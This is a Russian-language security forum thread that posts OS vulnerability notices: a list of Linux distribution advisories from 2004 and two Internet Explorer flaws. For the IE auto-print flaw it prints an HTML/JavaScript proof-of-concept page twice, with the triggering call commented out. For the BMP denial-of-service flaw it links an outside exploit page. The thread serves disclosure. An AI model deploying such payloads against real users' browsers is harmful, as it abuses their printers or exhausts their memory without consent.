lynx Advanced lynx Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Bugtraq по операционным системам     В теме разрешено постить только информацию о найденных уязвимостях в той или иной ОС, а также об их исправлениях.   Запрещено жаловаться, что кто-то на этой уязвимости погорел. Запрещены комментарии. Запрещено все, кроме постинга голой информации по уязвимостям и не менее голой по их исправлениям.     Обратите внимание, вопросы безопасности  в системном администрировании постятся в теме BugTraq для сисадминов: уязвимости/исправления форума "В помощь системному администратору". Вопросы по вирусам постятся в теме Вирусный bugtraq на ru-board форума "Андеграунд". Общие вопросы сетевой безопасности постятся в теме Новости сетевой безопасности форума "Андеграунд"       Все об уязвимости в RPC DCOM   Всего записей: 11712 | Зарегистр. 08-05-2001 | Отправлено: 18:14 13-10-2003 | Исправлено: lynx, 22:51 14-10-2003

Svarga Moderator Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Цитата: Уведомления Debian DSA 484-1 : Debian обновил xonix DSA 485-1 : Debian обновил ssmtp DSA 479-1: Debian обновил ядро (2.4.18) - несколько уязвимостей DSA 483-1 : Debian обновил mysql DSA 482-1 : Debian обновил ядро (2.4.17) - несколько уязвимостей DSA 479-2 : Debian обновил kernel-image-2.4.18-1-i386 Mandrake Linux MDKSA-2004:029 : Mandrake обновил ядро MDKSA-2004:028: Mandrake обновил cvs OpenPKG OpenPKG-SA-2004.013 : OpenPKG обновил cvs OpenPKG-SA-2004.014 : OpenPKG обновил mysql Red Hat RHSA-2004:158-01 : RedHat : Updated cadaver package fixes security vulnerability in neon RHSA-2004:154-01 : RedHat : Updated CVS packages fix security issue SuSE SuSE-SA:2004:008: SuSE обновил cvs SuSE-SA:2004:009 : SuSE обновил ядро     Цитата: Уязвимости Автоматическая распечатка Web страницы в Microsoft Internet Explorer Программа: Microsoft Internet Explorer 6.0   Опасность: Низкая   Наличие эксплоита: Да   Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTMl, который, когда будет загружен целевым пользователем, автоматически пошлет задание на принтер целевого пользователя.   Пример/Эксплоит:   Код: <HTML> <HEAD> <SCRIPT language="JavaScript"> function ieExecWB( intOLEcmd, intOLEparam ) {        // Create OLE Object           var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0   CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';           // Place Object on page           document.body.insertAdjacentHTML('beforeEnd', WebBrowser);           // if intOLEparam is not defined, set it           if ( ( ! intOLEparam ) || ( intOLEparam < -1 )  || (   intOLEparam > 1) )            intOLEparam = 1;           // Execute Object           WebBrowser1.ExecWB( intOLEcmd, intOLEparam );           // Destroy Object           WebBrowser1.outerHTML = ""; function printAll() { // Uncomment this to enable the exploit! //ieExecWB(6,-1); </SCRIPT> </HEAD> <BODY onload="printAll()"> <h3>I like your PRINTER</h3> </BODY> </HTML> URL производителя: http://www.microsoft.com/technet/security/   Удаленный отказ в обслуживании при обработке bmp изображений в Microsoft Internet Explorer Программа: Microsoft Internet Explorer 5.5-6.0   Опасность: Низкая   Наличие эксплоита: Да   Описание: Отказ в обслуживании обнаружен в Microsoft Internet Explorer. Удаленный пользователь может заставить целевой браузер использовать всю доступную системную память.   Удаленный пользователь может создать специально сформированный битмап файл, который, когда будет загружен целевым пользователем, заставит браузер выделить чрезмерно большое количество памяти, основываясь на размере файла, представленного пользователем.   Пример/Эксплоит: http://www.4rman.com/exploits/tinybmp.htm   URL производителя: http://www.Microsoft.com   Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. P. S. последнее работает и в Опере     Добавлено Код эксплоита^ для автораспечатки страниц с ошибками, вот он с исправлением оных: Код: <HTML> <HEAD> <SCRIPT language="JavaScript"> function ieExecWB( intOLEcmd, intOLEparam ) {        // Create OLE Object           var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0 CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';           // Place Object on page           document.body.insertAdjacentHTML('beforeEnd', WebBrowser);           // if intOLEparam is not defined, set it           if ( ( ! intOLEparam ) || ( intOLEparam < -1 )  || ( intOLEparam > 1) )            intOLEparam = 1;           // Execute Object           WebBrowser1.ExecWB( intOLEcmd, intOLEparam );           // Destroy Object           WebBrowser1.outerHTML = ""; } function printAll() { // Uncomment this to enable the exploit!   //ieExecWB(6,-1);   } </SCRIPT> </HEAD> <BODY onload="printAll()"> <h3>I like your PRINTER</h3> </BODY> </HTML> ---------- away. Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:50 15-04-2004

Страницы: 1 2 3 4 5 6

Компьютерный форум Ru.Board » Операционные системы » Другие ОС » Bugtraq по операционным системам

Переход по форумам  Закладки   » Компьютеры Цифровое изображение Программы Microsoft Windows UNIX Другие OS Hardware В помощь сисадмину Прикладное программирование Игры Форумные игры   » Интернет Web-программирование В помощь вебмастеру Графика Хостинг Зацените-ка!   » Тематические Ikonboard v.2 Ikonboard v.3 Invision Board Другие форумы PHP-Nuke и другие порталы Мобила   » Общие Спорт Флейм Темы по региональным встречам Музыка и Кино Юмор Литература и Живопись   » Ru.Board Новости Помощь по форуму   » Андеграунд eBookz Варезник Раздачи и акции Мобильный варезник Андеграунд Игры и фильмы   » Специальные Тестирование